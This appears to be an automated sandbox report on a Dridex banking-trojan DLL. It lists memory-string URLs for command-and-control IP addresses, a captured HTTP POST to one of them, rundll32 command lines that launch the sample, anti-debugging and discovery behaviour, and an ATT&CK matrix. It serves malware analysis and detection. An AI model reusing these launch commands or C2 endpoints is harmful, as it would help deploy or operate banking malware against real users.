                      Source: rundll32.exe, 00000004.00000003.398905066.0000000002CDC000.00000004.00000001.sdmpString found in binary or memory: https://14dl.windowsupdate.com/
                      Source: rundll32.exe, 00000004.00000003.556057703.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://182.46.210.220/
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/(
                      Source: loaddll32.exe, 00000001.00000002.776392794.00000000039C3000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.398905066.0000000002CDC000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.775709093.0000000002CAA000.00000004.00000020.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: rundll32.exe, 00000004.00000003.427426523.0000000002CF0000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/0
                      Source: rundll32.exe, 00000004.00000003.522936268.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4869
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/D
                      Source: rundll32.exe, 00000004.00000003.387226300.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/D/
                      Source: rundll32.exe, 00000004.00000003.576786904.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ES
                      Source: rundll32.exe, 00000004.00000003.576786904.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/h:
                      Source: loaddll32.exe, 00000001.00000002.776392794.00000000039C3000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ll
                      Source: rundll32.exe, 00000004.00000003.654312001.0000000002D14000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.627652177.0000000002D1A000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/oft
                      Source: rundll32.exe, 00000004.00000003.387226300.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/p
                      Source: rundll32.exe, 00000004.00000003.654312001.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/soft
                      Source: rundll32.exe, 00000004.00000003.556041713.0000000004EED000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/)
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/.
                      Source: rundll32.exe, 00000004.00000003.610648416.0000000004EED000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/
                      Source: rundll32.exe, 00000004.00000003.636168966.0000000004EED000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Certification
                      Source: rundll32.exe, 00000004.00000003.610683609.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dll
                      Source: rundll32.exe, 00000004.00000003.497839489.0000000004EF1000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/graphy
                      Source: rundll32.exe, 00000004.00000003.427413539.0000000004EF1000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/m
                      Source: rundll32.exe, 00000004.00000003.585363652.0000000004EED000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.765361543.0000000004EED000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.568147935.0000000004EED000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ography
                      Source: rundll32.exe, 00000004.00000003.654312001.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/r
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: rundll32.exe, 00000004.00000003.506302294.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/2
                      Source: rundll32.exe, 00000004.00000003.556041713.0000000004EED000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.765361543.0000000004EED000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: rundll32.exe, 00000004.00000002.776205925.0000000002D14000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/$/
                      Source: rundll32.exe, 00000004.00000003.576759052.0000000004EED000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/
                      Source: rundll32.exe, 00000004.00000003.427413539.0000000004EF1000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/0
                      Source: rundll32.exe, 00000004.00000003.427413539.0000000004EF1000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/44.140.214/
                      Source: rundll32.exe, 00000004.00000003.654264838.0000000004EED000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000004.00000003.556041713.0000000004EED000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.585363652.0000000004EED000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.765361543.0000000004EED000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: rundll32.exe, 00000004.00000002.776205925.0000000002D14000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/r
                      Source: rundll32.exe, 00000004.00000002.776205925.0000000002D14000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/rl/
                      Source: rundll32.exe, 00000004.00000003.390340200.0000000002D14000.00000004.00000001.sdmpString found in binary or memory: https://452.46.210.220/
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5839F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.7:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.7:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.7:49739 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 5.3.rundll32.exe.34bdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6e550000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.loaddll32.exe.110db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4dcdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.2bedb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.34bdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4dcdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.rundll32.exe.412db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.loaddll32.exe.110db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.6e550000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.rundll32.exe.412db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.2bedb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.328754438.0000000002BD0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.328249768.0000000004DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.352634465.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.777092817.000000006E551000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.362955357.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.361724173.0000000004110000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.777831655.000000006E551000.00000020.00020000.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojanShow sources
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5551A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.30568.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5667C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E571240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E559E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E569E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E56A660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E577660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E572E60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E55CA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E57FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E570220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E57D620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E556AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5696D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E57FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E573EC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E568EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5762F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E56F6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E56AE80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E568AB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5726B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E571EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E56BF50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E579B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E573B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E571730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5683C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E567FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E577FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E56E3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E56D030
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E571020
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E55ACD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E56A0D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5698DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5688C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E568CC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E575CB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E56E0A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E574CA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5750A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E57DCA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E551570
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E567564
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E56FDD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5789F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5771F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E565DE8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E56C590
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E56D980
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E57D180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E55F9A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E59E210
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5622A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E57BE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.30568.dllReversingLabs: Detection: 15%
                      Source: SecuriteInfo.com.Variant.Razy.980776.30568.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Bluewing
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Masterjust
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engineClassification label: mal84.bank.troj.evad.winDLL@11/4@0/5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.30568.30608Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: SecuriteInfo.com.Variant.Razy.980776.30568.dllStatic file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.30568.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.30568.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000001.00000002.777371551.000000006E617000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.778184559.000000006E617000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.30568.dll
                      Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E563930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E57CEF8 FindFirstFileExW,
                      Source: rundll32.exe, 00000004.00000003.398905066.0000000002CDC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWx
                      Source: rundll32.exe, 00000004.00000003.654544522.0000000002D07000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E5C97B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E5C8B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E5C47C0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E69BA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E69B64D push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E69B942 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E566C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E567A60 RtlAddVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E5963A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.30568.dll',#1
                      Source: loaddll32.exe, 00000001.00000002.775126489.0000000001860000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.776941345.0000000003140000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
                      Source: loaddll32.exe, 00000001.00000002.775126489.0000000001860000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.776941345.0000000003140000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000001.00000002.775126489.0000000001860000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.776941345.0000000003140000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000001.00000002.775126489.0000000001860000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.776941345.0000000003140000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E562980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection112Process Injection112OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRundll321LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery23Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Variant.Razy.980776.30568.dll6%VirustotalBrowse
                      SecuriteInfo.com.Variant.Razy.980776.30568.dll16%ReversingLabsWin32.Worm.Cridex

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://143.244.140.214:808/60%Avira URL Cloudsafe
                      https://143.244.140.214:808/hy0%URL Reputationsafe
                      https://143.244.140.214:808/8D0%Avira URL Cloudsafe
                      https://143.244.140.214:808/10%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dll0%Avira URL Cloudsafe
                      https://143.244.140.214:808/ln0%Avira URL Cloudsafe
                      https://143.244.140.214/U0%Avira URL Cloudsafe
                      https://143.244.140.214:808/(0%Avira URL Cloudsafe
                      https://143.244.140.214:808/)0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/h:0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/0%URL Reputationsafe
                      https://192.46.210.220/Certification0%URL Reputationsafe
                      https://192.46.210.220/7.0.96:6891/Microsoft0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/.0.96:6891/0%Avira URL Cloudsafe
                      https://45.77.0.96/0%URL Reputationsafe
                      https://185.56.219.47:8116/oft0%Avira URL Cloudsafe
                      https://143.244.140.214:808/$0%Avira URL Cloudsafe
                      https://143.244.140.214:808/%0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/48690%Avira URL Cloudsafe
                      https://185.56.219.47/(0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/r0%Avira URL Cloudsafe
                      https://143.244.140.214:808/jQX%0%Avira URL Cloudsafe
                      https://143.244.140.214:808/oft0%URL Reputationsafe
                      https://185.56.219.47:8116/p0%Avira URL Cloudsafe
                      https://143.244.140.214/-0%Avira URL Cloudsafe
                      https://143.244.140.214:808/lln0%Avira URL Cloudsafe
                      https://192.46.210.220/graphy0%Avira URL Cloudsafe
                      https://45.77.0.96/20%Avira URL Cloudsafe
                      https://143.244.140.214:808/ll0%Avira URL Cloudsafe
                      https://192.46.210.220/)0%Avira URL Cloudsafe
                      https://192.46.210.220/0%URL Reputationsafe
                      https://182.46.210.220/0%Avira URL Cloudsafe
                      https://192.46.210.220/7.0.96:6891/0%Avira URL Cloudsafe
                      https://142.46.210.220/0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/ES0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/soft0%Avira URL Cloudsafe
                      https://192.46.210.220/.0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/ll0%Avira URL Cloudsafe
